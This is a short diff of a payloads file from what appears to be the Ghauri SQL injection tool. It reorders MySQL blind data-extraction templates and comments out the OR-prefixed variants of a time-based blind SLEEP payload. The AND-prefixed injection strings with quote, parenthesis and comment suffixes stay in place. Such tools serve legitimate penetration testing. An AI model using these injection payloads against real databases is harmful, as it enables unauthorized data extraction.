■ ■ ■ ■ ■ ■
ghauri/common/payloads.py
| skipped 50 lines |
51 | 51 | | |
52 | 52 | | DATA_EXTRACTION_PAYLOADS = { |
53 | 53 | | "MySQL": { |
54 | | - | "ASC": "ORD(MID(IFNULL({query},0x20),{position},1))={char}", |
55 | 54 | | "ASCII": "ORD(MID({query},{position},1))={char}", |
| 55 | + | "ASC": "ORD(MID(IFNULL({query},0x20),{position},1))={char}", |
56 | 56 | | "CHAR": "MID({query},{position},1)=CHAR({char})", |
57 | 57 | | }, |
58 | 58 | | "Oracle": { |
| skipped 406 lines |
465 | 465 | | "payload": "SLEEP([SLEEPTIME])", |
466 | 466 | | "comments": [ |
467 | 467 | | {"pref": " AND ", "suf": ""}, |
468 | | - | {"pref": " OR ", "suf": ""}, |
| 468 | + | # {"pref": " OR ", "suf": ""}, |
469 | 469 | | {"pref": " AND ", "suf": "-- wXyW"}, |
470 | | - | {"pref": " OR ", "suf": "-- wXyW"}, |
| 470 | + | # {"pref": " OR ", "suf": "-- wXyW"}, |
471 | 471 | | {"pref": "' AND ", "suf": "-- wXyW"}, |
472 | | - | {"pref": "' OR ", "suf": "-- wXyW"}, |
| 472 | + | # {"pref": "' OR ", "suf": "-- wXyW"}, |
473 | 473 | | {"pref": '" AND ', "suf": "-- wXyW"}, |
474 | | - | {"pref": '" OR ', "suf": "-- wXyW"}, |
| 474 | + | # {"pref": '" OR ', "suf": "-- wXyW"}, |
475 | 475 | | {"pref": ") AND ", "suf": "-- wXyW"}, |
476 | | - | {"pref": ") OR ", "suf": "-- wXyW"}, |
| 476 | + | # {"pref": ") OR ", "suf": "-- wXyW"}, |
477 | 477 | | {"pref": "') AND ", "suf": "-- wXyW"}, |
478 | | - | {"pref": "') OR ", "suf": "-- wXyW"}, |
| 478 | + | # {"pref": "') OR ", "suf": "-- wXyW"}, |
479 | 479 | | {"pref": '") AND ', "suf": "-- wXyW"}, |
480 | | - | {"pref": '") OR ', "suf": "-- wXyW"}, |
| 480 | + | # {"pref": '") OR ', "suf": "-- wXyW"}, |
481 | 481 | | ], |
482 | 482 | | "title": "MySQL >= 5.0.12 time-based blind (SLEEP)", |
483 | 483 | | "vector": "0986=IF(([INFERENCE]),SLEEP([SLEEPTIME]),986)", |
| skipped 1296 lines |